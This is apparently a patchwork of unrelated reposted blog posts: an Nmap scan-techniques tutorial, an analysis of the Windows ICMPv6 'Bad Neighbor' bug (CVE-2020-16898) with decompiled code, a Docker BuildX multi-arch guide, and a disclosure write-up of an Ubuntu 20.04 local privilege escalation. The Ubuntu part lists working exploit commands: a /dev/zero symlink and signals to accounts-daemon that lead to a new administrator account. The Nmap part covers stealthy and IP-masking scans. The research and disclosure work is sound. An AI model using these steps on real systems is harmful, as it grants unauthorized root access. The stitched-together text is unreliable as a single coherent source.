So if you’re like me and have done man nmap or nmap -h to see what Nmap has to offer, you’ll notice it prints lines and lines of output. In this blog post, I’ll try and demystify many of the scan techniques it has to offer, including some uncommon ones that you may never have to use in your life.

TCP Connect Scan (-sT)

Syntax: nmap -sT <target-ip> [-p <ports>]
Let’s kick this off with one of the more common ones. Personally, I rarely ever use -sT unless -sS doesn’t work (but if -sS doesn’t work, I doubt that -sT is going to work, either). Nevertheless, it is good to know how a TCP Connect scan works and how Nmap can leverage TCP to reveal port status. Basically, TCP Connect scans utilise TCP’s connection-oriented nature to attempt to perform a full 3-way TCP handshake with each port and verify its state.

Image for post
TCP Connect Scan captured in Wireshark (23 = closed, 22 = open)

Nmap sends a SYN packet to initiate the 3-way TCP handshake. If the port is closed (look at top 2 packets), the port replies with a RST-ACK, to terminate the connection.

If the port is open (look at next 5 packets), the server replies with a SYN-ACK, and Nmap completes the 3-way handshake with an ACK packet. Then (after the port updates the window [search “TCP sliding window”]), Nmap immediately terminates the connection with a RST-ACK packet.

Pro: quite reliably scans TCP ports
Cons: less “stealthy” (connection attempts will be logged by the server), takes a longer time, sends more packets

TCP SYN (“Stealth”/“Half-Open”) Scan (-sS)

Syntax: nmap [-sS] <target-ip> [-p <ports>]
The SYN scan is the default scan of Nmap, and it goes by many names, the first referring to its sneaky nature of avoiding connnection attempts from being logged by the server (nowadays, the SYN scan is not so stealthy anymore). But how does it achieve this? The second name explains it — “Half Open” refers to SYN scan’s method of performing only 2 steps of the 3-way TCP handshake. We never send the third and last packet, and instead terminate the connection, therefore allowing Nmap to verify the port’s status without fully connecting to the port.

Image for post
TCP SYN Scan captured in Wireshark (23 = closed, 22 = open)

ust like the TCP Connect scan, Nmap sends a SYN packet to initate the handshake, and if the port is closed, receives a RST-ACK (packets 1, 3).

However, this time, if the port is open, after Nmap receives the SYN-ACK, it
immediately sends a RST packet to terminate the connection, as it has verified that the port is open due to it responding with a SYN-ACK (packets 4,5).

Pros: quicker and sends less packets
Con: with advancements in firewall and server defenses technology, it is not stealthy anymore

UDP Scan (-sU)

Syntax: nmap -sU <target-ip> [-p <ports>]
UDP Scanning utilises UDP and ICMP packets to discover the status of a port. Nmap sends an empty UDP packet and either receives no reply or an ICMP Port Unreachable packet. But due to UDP’s connectionless nature, the output can be unreliable at times.

Image for post
UDP Scan captured with Wireshark (88 = open, 89 = closed)

Nmap sends an empty UDP packet for both ports (packets 1,2,4) and receives no reply from port 88 twice(open) and an ICMP Port Unreachable packet (packet 3) from port 89 (closed).

But Nmap returns this output:

Image for post
Nmap returns “open|filtered”

What’s up with the “open|filtered” instead of “open”?
Here’s the thing: when Nmap received no reply from port 88, one scenario could be that port 88 really is open, and is therefore not responding with any reply, however, another possible scenario is that a firewall is filtering out our traffic and thus the UDP packet never reaches the target and we receive no reply. Either way, we won’t know the difference — which results in Nmap displaying “open|filtered”.

Pros: allows the scanning of UDP ports
Cons: not always reliable

Null, FIN & Xmas Scans (-sN, -sF, -sX)

Syntax: nmap {-sN -sF -sX} <target-ip> [-p <ports>]
Now we get to the scan techniques that we will come across much less often. All of Null, FIN and Xmas scans are intended to stealthily sneak through stateless firewalls and packet filters, by turning on different TCP flags
Null scan: no flags set
FIN scan: FIN flag set
Xmas scan: FIN, PSH, URG flags set (packet lights up like a Christmas tree, hence the name)

Image for post
Null, FIN and Xmas scan captured in Wireshark (22 = open, 23 = closed)

For all of the scans, the underlying procedure is the same, except for the flags. If a port is closed, it replies with a RST-ACK and if it is open, it does not reply. However, this is not the case for all machines as not every machine follows RFC 793 and can send a RST packet even though the port is open. Additionally, since these scans rely on open ports not replying back (like UDP scan), it also suffers the issue of us not knowing if a firewall has filtered our packets or not (thus our output of “open|filtered”).

Pro: can sneak through some firewalls and packet filters
Cons: not all machines conform to RFC 793, not always reliable

ACK Scan (-sA)

Syntax: nmap -sA <target-ip> [-p <ports>]
Now, the ACK scan is a little bit different to what we’ve looked at so far. The ACK Scan isn’t meant to discover the open/closed status of ports. Instead, it helps us visualise the rulesets of intermediary firewalls. As the name suggests, Nmap sends TCP packets with only the ACK flag set, and if it receives a RST packet (both open and closed ports will respond with a RST), the port is marked as “unfiltered”, but if it receives no reply, or an ICMP error, the port is marked as “filtered”, and the firewall has filtered the packet.

Image for post
ACK Scan captured in Wireshark (22 = open, 23 = closed)

Port 22 is open, while port 23 is closed, but both reply with a RST packet when an ACK packet is sent. This shows that both ports are not filtered by any firewalls.

Pro: maps out firewall rulesets
Con: cannot determine if the port is open or closed

Idle Scan (-sI)

Syntax: nmap -sI <zombie-ip> <target-ip> [-p <ports>]
This is the most interesting — yet the most complex — scan of all. As you can see from the syntax, we require a “zombie” in order to perform an idle scan. In a nutshell, Nmap will attempt to leverage an idle host to indirectly launch a port scan, therefore hiding our IP address from the target. It does this using the difference in increments of the IP ID of the zombie.

To understand how Nmap achieves this in understandable detail, please look at figures 5.65.7 and 5.8 in https://nmap.org/book/idlescan.html.

Pro: masks our true IP address
Con: possibility of false positives (due to zombie host not being idle)

Further Digging:

If you want to know more about these scan types, and other scan types Nmap has to offer, take a look at:
https://nmap.org/book/man-port-scanning-techniques.html

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

Original text by FOLLOW ZECOPS

At the Patch Tuesday on October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that with a successful exploitation it could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.

In days following the publication, several write-ups and POCs were published. We looked at some of them:

The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.

We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD)

In this writeup, we’ll share our findings.

The bug in a nutshell

The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).

The packet structure is (RFC 4861):

As can be seen from the packet structure, the packet consists of a 16-bytes header, followed by a variable amount of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.

The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):

The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds additional 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.

Visualizing the POC of 0xeb-bp

As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:

As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-bytes buffer. The two options have an even length of 4, which triggers the bug.

The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.

Here’s how the first iteration sees the packet:

Each option structure is just skipped according to the length field after doing some basic checks.

Here’s how the second iteration sees it:

This time, in the case of a Recursive DNS Server option, the length field is used to determine the amount of IPv6 addresses, which is calculated as following:

amount_of_addr = (length – 1) / 2

Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration. 

Specifically in this POC, 34 is not a valid length for option of the type 24, but because it wasn’t validated, the processing continues and too many bytes are copied on the stack, causing a stack overflow. Noteworthy, fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).

Zooming out

Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them? 

We didn’t find answers to these questions in any writeup, so we checked it ourselves.

Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:

if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
    // error

// Initialization and other code...

NET_BUFFER NetBuffer = /* ... */;

// First loop
while (NetBuffer->DataLength >= 2)
{
    BYTE TempTypeLen[2];
    BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
    WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
    if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
        // error

    BYTE OptionType = TempTypeLenPtr[0];
    switch (OptionType)
    {
    case 1: // Source Link-layer Address
        // ...
        break;

    case 3: // Prefix Information
        if (OptionLenInBytes != 0x20)
            // error

        BYTE TempPrefixInfo[0x20];
        BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
        BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
        if (PrefixInfoPrefixLength > 128)
            // error
        break;

    case 5: // MTU
        // ...
        break;

    case 24: // Route Information Option
        if (OptionLenInBytes > 0x18)
            // error

        BYTE TempRouteInfo[0x18];
        BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
        BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
        if (RouteInfoPrefixLength > 128 ||
            (RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
            (RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
            // error
        break;

    case 25: // Recursive DNS Server Option
        if (OptionLenInBytes < 0x18)
            // error

        // Added after the patch - this it the fix
        //if (OptionLenInBytes - 8 % 16 != 0)
        //    // error
        break;

    case 31: // DNS Search List Option
        if (OptionLenInBytes < 0x10)
            // error
        break;
    }

    NetBuffer->DataOffset += OptionLenInBytes;
    NetBuffer->DataLength -= OptionLenInBytes;
    // Other adjustments for NetBuffer...
}

// Rewind NetBuffer and do other stuff...

// Second loop...
while (NetBuffer->DataLength >= 2)
{
    BYTE TempTypeLen[2];
    BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
    WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
    if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
        // error

    BOOL AdvanceBuffer = TRUE;

    BYTE OptionType = TempTypeLenPtr[0];
    switch (OptionType)
    {
    case 3: // Prefix Information
        BYTE TempPrefixInfo[0x20];
        BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
        BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
        // Lots of code. Assumptions:
        // PrefixInfoPrefixLength <= 128
        break;

    case 24: // Route Information Option
        BYTE TempRouteInfo[0x18];
        BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
        BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
        // Some code. Assumptions:
        // PrefixInfoPrefixLength <= 128
        // Other, less interesting assumptions about PrefixInfoPrefixLength
        break;

    case 25: // Recursive DNS Server Option
        Ipv6pUpdateRDNSS(..., NetBuffer, ...);
        AdvanceBuffer = FALSE;
        break;

    case 31: // DNS Search List Option
        Ipv6pUpdateDNSSL(..., NetBuffer, ...);
        AdvanceBuffer = FALSE;
        break;
    }

    if (AdvanceBuffer)
    {
        NetBuffer->DataOffset += OptionLenInBytes;
        NetBuffer->DataLength -= OptionLenInBytes;
        // Other adjustments for NetBuffer...
    }
}

// More code...

}

As can be seen from the code, only 6 option types are supported in the first loop, the others are ignored. In any case, each header is skipped precisely according to the Length field.

Even less options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 24 (the Route Information Option) and 25 (Recursive DNS Server Option) have functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies. 

That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.

Breaking assumptions

Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.

  • Option type 3 – Prefix Information
    • The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
    • The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overridden later anyway, so causing such out-of-bounds writes has no practical value.

      For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
  • Option type 24 – Route Information Option
    • The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
    • The Prefix Length field value must be at most 128. Same implications as for option type 3.
    • The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
  • Option type 25 – Recursive DNS Server Option
    • The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8-bytes is not valid according to the specification.
    • The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
  • Option type 31 – DNS Search List Option
    • The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.

As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.

Revisiting the Stack Overflow

Before giving up, we took a closer look at the stack. The POCs that we’ve seen are overriding the stack such that the stack cookie (the __security_cookie value) is overridden, causing a system crash before the function returns.

We checked whether overriding anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.

Summary

We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we may have missed something. Any insights / feedback is welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.

Preparation toward running Docker on ARM Mac: Building multi-arch images with Docker BuildX

Preparation toward running Docker on ARM Mac: Building multi-arch images with Docker BuildX

Original text by Akihiro Suda

Today, Apple announced that they will ditch Intel and switch to ARM-based chips. This means that Docker for Mac will only be able to run ARM images natively.

o, Docker will no longer be useful when you want to run the same image on Mac and on x86_64 cloud instances? Nope. Docker will remain useful, as long as the image is built with support for multi-architectures.

Image for post

If you are still building images only for x86_64, you should switch your images to multi-arch as soon as possible, ahead of the actual release of ARM Mac.

Note: ARM Mac will be probably able to run x86_64 images via an emulator, but the performance penalty will be significant.

Building multi-arch images with Docker BuildX

To build multi-architecture images, you need to use Docker BuildX plugin (docker buildx build ) instead of the well-known docker build command.

If you have already heard about the BuildKit mode ( export DOCKER_BUILDKIT=1 ) of the built-in docker build command, you might be confused now, and you might be wondering BuildKit was deprecated. No worry, BuildKit is still alive. Actually Docker BuildX is built on BuildKit technology as well, but significantly enhanced compared to the BuildKit mode of the built-in docker build. Aside from multi-arch build, Docker BuildX also comes with a lot of innovative features such as distributed build on Kubernetes clusters. See my previous post for the further information.

Docker BuildX is installed by default if you are using Docker for Mac on macOS. If you are using Docker for Linux on your own Linux VM (or baremetal Linux), you might need to install Docker BuildX separately. See https://github.com/docker/buildx#installing for the installation steps on Linux.

The three options for multi-arch build

Docker BuildX provides the three options for building multi-arch images:

  1. QEMU mode (easy, slow)
  2. Cross-compilation mode (difficult, fast)
  3. Remote mode (easy, fast, but needs an extra machine)

The easiest option is to use QEMU mode (Option 1), but it incurs significant performance penalty. So, using cross compilation (Option 2) is recommended if you don’t mind adapting Dockerfiles for cross compilation toolchains. If you already have an ARM machine (doesn’t need to be Mac of course), the third option is probably the best choice for you.

Option 1: QEMU mode (easy, slow)

This mode uses QEMU User Mode Emulation for running ARM toolchains on a x86_64 Linux environment. Or the quite opposite after the actual release of ARM Mac: x86_64 toolchains on ARM.

The QEMU integration is already enabled by default on Docker for Mac. If you are using Docker for Linux, you need to enable the QEMU integration using the linuxkit/binfmt tool:

$ uname -sm
Linux x86_64$ docker run --rm --privileged linuxkit/binfmt:v0.8$ ls -1 /proc/sys/fs/binfmt_misc/qemu-*
/proc/sys/fs/binfmt_misc/qemu-aarch64
/proc/sys/fs/binfmt_misc/qemu-arm
/proc/sys/fs/binfmt_misc/qemu-ppc64le
/proc/sys/fs/binfmt_misc/qemu-riscv64
/proc/sys/fs/binfmt_misc/qemu-s390x

Then initialize Docker BuildX as follows. This step is required on Docker for Mac as well as on Docker for Linux.

$ docker buildx create --use --name=qemu$ docker buildx inspect --bootstrap
...Nodes:
Name: qemu0
Endpoint: unix:///var/run/docker.sock
Status: running
Platforms: linux/amd64, linux/arm64, linux/riscv64, linux/ppc64le, linux/s390x, linux/386, linux/arm/v7, linux/arm/v6

Make sure the command above shows both linux/amd64 andlinux/arm64 as the supported platforms.

As an example, let’s try dockerizing a “Hello, world” application (GNU Hello) for these architectures. Here is the Dockerfile:

FROM debian:10 AS build
RUN apt-get update && \
apt-get install -y curl gcc make
RUN curl https://ftp.gnu.org/gnu/hello/hello-2.10.tar.gz | tar xz
WORKDIR hello-2.10
RUN LDFLAGS=-static \
./configure && \
make && \
mkdir -p /out && \
mv hello /outFROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

This Dockerfile doesn’t need to have anything specific to ARM, because QEMU can cover the architecture differences between x86_64 and ARM.

The image can be built and pushed to a registry using the following command. It took 498 seconds on my MacBookPro 2016.

$ docker buildx build \
--push -t example.com/hello:latest \
--platform=linux/amd64,linux/arm64 .
[+] Building 498.0s (17/17) FINISHED

The images contains binaries for both x86_64 and ARM. The image can be executed on any machine with these architectures, without enabling QEMU.

$ docker run --rm example.com/hello:latest
Hello, world!$ ssh me@my-arm-instance[me@my-arm-instance]$ uname -sm
Linux aarch64[me@my-arm-instance]$ docker run --rm example.com/hello:latest
Hello, world!

Option 2: Cross-compilation mode (difficult, fast)

The QEMU mode incurs significant performance penalty for interpreting ARM instructions on x86_64 (or x86_64 on ARM after the actual release of ARM Mac). If the QEMU mode is too slow for your application, consider using the cross-compilation mode instead.

To cross-compile the GNU Hello example, you need to modify the Dockerfile significantly:

FROM --platform=$BUILDPLATFORM debian:10 AS build
RUN apt-get update && \
apt-get install -y curl gcc make
RUN curl -o /cross.sh https://raw.githubusercontent.com/tonistiigi/binfmt/18c3d40ae2e3485e4de5b453e8460d6872b24d6b/binfmt/scripts/cross.sh && chmod +x /cross.sh
RUN curl https://ftp.gnu.org/gnu/hello/hello-2.10.tar.gz | tar xz
WORKDIR hello-2.10
ARG TARGETPLATFORM
RUN /cross.sh install gcc | sh
RUN LDFLAGS=-static \
./configure --host $(/cross.sh cross-prefix) && \
make && \
mkdir -p /out && \
mv hello /outFROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

This Dockerfile contains two essential variables: BUILDPLATFORM and TARGETPLATFORM .

BUILDPLATFORM is pinned to the host platform ("linux/amd64" ). TARGETPLATFORM is conditionally set to the target platforms ( "linux/amd64" and "linux/arm64" ) and is used for setting up cross compilation tool chains like aarch64-linux-gnu-gcc via a helper script cross.sh . This kind of helper script can be a mess depending on the application’s build scripts, especially in C applications.

For comparison, cross-compiling Go programs is relatively straightforward:

FROM --platform=$BUILDPLATFORM golang:1.14 AS build
ARG TARGETARCH
ENV GOARCH=$TARGETARCH
RUN go get github.com/golang/example/hello && \
go build -o /out/hello github.com/golang/example/helloFROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

The image can be built and pushed as follows without enabling QEMU. Cross-compiling GNU hello took only 95.3 seconds.

$ docker buildx create --use --name=cross$ docker buildx inspect --bootstrap cross
Nodes:
Name: cross0
Endpoint: unix:///var/run/docker.sock
Status: running
Platforms: linux/amd64, linux/386$ docker buildx build \
--push -t example.com/hello:latest \
--platform=linux/amd64,linux/arm64 .
[+] Building 95.3s (16/16) FINISHED

Option 3: Remote mode (easy, fast, but needs an extra machine)

The third option is to use a real ARM machine (e.g. an Amazon EC2 A1 instance) for compiling ARM binaries. This option is as easy as Option 1 and yet as fast as Option 2.

To use this option, you need to have an ARM machine accessible via docker CLI. The easiest way is to use ssh://<USERNAME>@<HOST> URL as follows:

$ docker -H ssh://me@my-arm-instance info
...
Architecture: aarch64
...

Also, depending on the network configuration, you might want to add ControlPersist settings in ~/.ssh/config for faster and stabler SSH connection.

ControlMaster auto
ControlPath ~/.ssh/control-%C
ControlPersist yes

This remote ARM instance can be registered to Docker BuildX using the following commands:

$ docker buildx create --name remote --use$ docker buildx create --name remote \
--append ssh://me@my-arm-instance$ docker buildx build \
--push -t example.com/hello:latest \
--platform=linux/amd64,linux/arm64 .
[+] Building 113.4s (22/22) FINISHED

The Dockerfile is same as Option 1.

FROM debian:10 AS build
RUN apt-get update && \
apt-get install -y curl gcc make
RUN curl https://ftp.gnu.org/gnu/hello/hello-2.10.tar.gz | tar xz
WORKDIR hello-2.10
RUN LDFLAGS=-static \
./configure && \
make && \
mkdir -p /out && \
mv hello /outFROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

In this example, an Intel Mac is used as the local and an ARM machine is used as the remote. But after the release of actual ARM Mac, you will do the opposite: use an ARM Mac as the local and an x86_64 machine as the remote.

Performance comparison

  1. QEMU mode: 498.0s
  2. Cross-compilation mode: 95.3s
  3. Remote mode: 113.4s

The QEMU mode is the easiest, but taking 498 seconds seems too slow for compiling “hello world”. The cross-compilation mode is the fastest but modifying Dockerfile can be a mess. I suggest using the remote mode whenever possible.

We’re hiring!

NTT is looking for engineers who work in Open Source communities like Kubernetes & Docker projects. If you wish to work on such projects please do visit our recruitment page.

To know more about NTT contribution towards open source projects please visit our Software Innovation Center page. We have a lot of maintainers and contributors in several open source projects.

Our offices are located in the downtown area of Tokyo (Tamachi, Shinagawa) and Musashino.

How to get root on Ubuntu 20.04 by pretending nobody’s /home

How to get root on Ubuntu 20.04 by pretending nobody’s /home

Original text by Kevin Backhouse

I am a fan of Ubuntu, so I would like to help make it as secure as possible. I have recently spent quite a bit of time looking for security vulnerabilities in Ubuntu’s system services, and it has mostly been an exercise in frustration. I have found (and reported) a few issues, but the majority have been low severity. Ubuntu is open source, which means that many people have looked at the source code before me, and it seems like all the easy bugs have already been found. In other words, I don’t want this blog post to give you the impression that Ubuntu is full of trivial security bugs; that’s not been my impression so far.

This blog post is about an astonishingly straightforward way to escalate privileges on Ubuntu. With a few simple commands in the terminal, and a few mouse clicks, a standard user can create an administrator account for themselves. I have made a short demo video, to show how easy it is.

It’s unusual for a vulnerability on a modern operating system to be this easy to exploit. I have, on some occasions, written thousands of lines of code to exploit a vulnerability. Most modern exploits involve complicated trickery, like using a memory corruption vulnerability to forge fake objects in the heap, or replacing a file with a symlink with microsecond accuracy to exploit a TOCTOU vulnerability. So these days it’s relatively rare to find a vulnerability that doesn’t require coding skills to exploit. I also think the vulnerability is easy to understand, even if you have no prior knowledge of how Ubuntu works or any security research experience.

Disclaimer: For someone to exploit this vulnerability, they need access to the graphical desktop session of the system, so this issue affects desktop users only.

Exploitation steps

Here is a description of the exploitation steps, as shown in the demo video.

First, open a terminal and create a symlink in your home directory:

ln -s /dev/zero .pam_environment

(If that doesn’t work because a file named .pam_environment already exists, then just temporarily rename the old file so that you can restore it later.)

Next, open “Region & Language” in the system settings and try to change the language. The dialog box will freeze, so just ignore it and go back to the terminal. At this point, a program named accounts-daemon is consuming 100% of a CPU core, so your computer may become sluggish and start to get hot.

In the terminal, delete the symlink. Otherwise you might lock yourself out of your own account!

rm .pam_environment

The next step is to send a SIGSTOP signal to accounts-daemon to stop it from thrashing that CPU core. But to do that, you first need to know accounts-daemon’s process identifier (PID). In the video, I do that by running top, which is a utility for monitoring the running processes. Because accounts-daemon is stuck in an infinite loop, it quickly goes to the top of the list. Another way to find the PID is with the pidof utility:

$ pidof accounts-daemon
597

Armed with accounts-daemon’s PID, you can use kill to send the SIGSTOP signal:

kill -SIGSTOP 597

Your computer can take a breather now.

Here is the crucial step. You’re going to log out of your account, but first you need to set a timer to reset accounts-daemon after you have logged out. Otherwise you’ll just be locked out and the exploit will fail. (Don’t worry if this happens: everything will be back to normal after a reboot.) This is how to set the timer:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597"

The nohup utility is a simple way to leave a script running after you have logged out. This command tells it to run a bash script that does three things:

  1. Sleep for 30 seconds. (You just need to give yourself enough time to log out. I set it to 10 seconds for the video.)
  2. Send accounts-daemon a SIGSEGV signal, which will make it crash.
  3. Send accounts-daemon a SIGCONT signal to deactivate the SIGSTOP, which you sent earlier. The SIGSEGV won’t take effect until the SIGCONT is received.

Once completed, log out and wait a few seconds for the SIGSEGV to detonate. If the exploit is successful, then you will be presented with a series of dialog boxes which let you create a new user account. The new user account is an administrator account. (In the video, I run id to show that the new user is a member of the sudo group, which means that it has root privileges.)

Victory!

How does it work?

Stay with me! Even if you have no prior knowledge of how Ubuntu (or more specifically, GNOME) works, I reckon I can explain this vulnerability to you. There are actually two bugs involved. The first is in accountsservice, which is a service that manages user accounts on the computer. The second is in GNOME Display Manager (gdm3), which, among other things, handles the login screen. I’ll explain each of these bugs separately below.

accountsservice denial of service (GHSL-2020-187, GHSL-2020-188 / CVE-2020-16126, CVE-2020-16127)

The accountsservice daemon (accounts-daemon) is a system service that manages user accounts on the machine. It can do things like create a new user account or change a user’s password, but it can also do less security-sensitive things like change a user’s icon or their preferred language. Daemons are programs that run in the background and do not have their own user interface. However, the systems settings dialog box can communicate with accounts-daemon via a message system known as D-Bus.

System Settings: Users

System Settings: Region & Language

In the exploit, I use the systems settings dialog box to change the language. A standard user is allowed to change that setting on their own account — administrator privileges are not required. Under the hood, the systems services dialog box sends the org.freedesktop.Accounts.User.SetLanguage command to accounts-daemon, via D-Bus.

It turns out that Ubuntu uses a modified version of accountsservice that includes some extra code that doesn’t exist in the upstream version maintained by freedesktop. Ubuntu’s patch adds a function named is_in_pam_environment, which looks for a file named .pam_environment in the user’s home directory and reads it. The denial of service vulnerability works by making .pam_environment a symlink to /dev/zero/dev/zero is a special file that doesn’t actually exist on disk. It is provided by the operating system and behaves like an infinitely long file in which every byte is zero. When is_in_pam_environment tries to read .pam_environment, it gets redirected to /dev/zero by the symlink, and then gets stuck in an infinite loop because /dev/zero is infinitely long.

There’s a second part to this bug. The exploit involves crashing accounts-daemon by sending it a SIGSEGV. Surely a standard user shouldn’t be allowed to crash a system service like that? They shouldn’t, but accounts-daemon inadvertently allows it by dropping privileges just before it starts reading the user’s .pam_environment. Dropping privileges means that the daemon temporarily forfeits its root privileges, adopting instead the lower privileges of the user. Ironically, that’s intended to be a security precaution, the goal of which is to protect the daemon from a malicious user who does something like symlinking their .pam_environment to /etc/shadow, which is a highly sensitive file that standard users aren’t allowed to read. Unfortunately, when done incorrectly, it also grants the user permission to send the daemon signals, which is why we’re able to send accounts-daemon a SIGSEGV.

gdm3 privilege escalation due to unresponsive accounts-daemon (GHSL-2020-202 / CVE-2020-16125)

GNOME Display Manager (gdm3) is a fundamental component of Ubuntu’s user interface. It handles things like starting and stopping user sessions when they log in and out. It also manages the login screen.

gdm3 login screen

Another thing handled by gdm3 is the initial setup of a new computer. When you install Ubuntu on a new computer, one of the first things that you need to do is create a user account. The initial user account needs to be an administrator so that you can continue setting up the machine, doing things like configuring the wifi and installing applications. Here is a screenshot of the initial setup screen (taken from the exploit video):

gnome-initial-setup

The dialog box that you see in the screenshot is a separate application, called gnome-initial-setup. It is triggered by gdm3 when there are zero user accounts on the system, which is the expected scenario during the initial setup of a new computer. How does gdm3 check how many users there are on the system? You probably already guessed it: by asking accounts-daemon! So what happens if accounts-daemon is unresponsive? The relevant code is here.

It uses D-Bus to ask accounts-daemon how many users there are, but since accounts-daemon is unresponsive, the D-Bus method call fails due to a timeout. (In my testing, the timeout took around 20 seconds.) Due to the timeout error, the code does not set the value of priv->have_existing_user_accounts. Unfortunately, the default value of priv->have_existing_user_accounts is false, not true, so now gdm3 thinks that there are zero user accounts and it launches gnome-initial-setup.

How did I find it?

I have a confession to make: I found this bug completely by accident. This is the message that I sent to my colleagues at approximately 10pm BST on October 14:

I just got LPE by accident, but I am not quite sure how to reproduce it. 🤦

Here’s what happened: I had found a couple of denial-of-service vulnerabilities in accountsservice. I considered them low severity, but was writing them up for a vulnerability report to send to Ubuntu. Around 6pm, I stopped work and closed my laptop lid. Later in the evening, I opened the laptop lid and discovered that I was locked out of my account. I had been experimenting with the .pam_environment symlink and had forgotten to delete it before closing the lid. No big deal: I used Ctrl-Alt-F4 to open a console, logged in (the console login was not affected by the accountsservice DOS), and killed accounts-daemon with a SIGSEGV. I didn’t need to use sudo due to the privilege dropping vulnerability. The next thing I knew, I was looking at the gnome-initial-setup dialog boxes, and was amazed to discover that I was able to create a new user with administrator privileges.

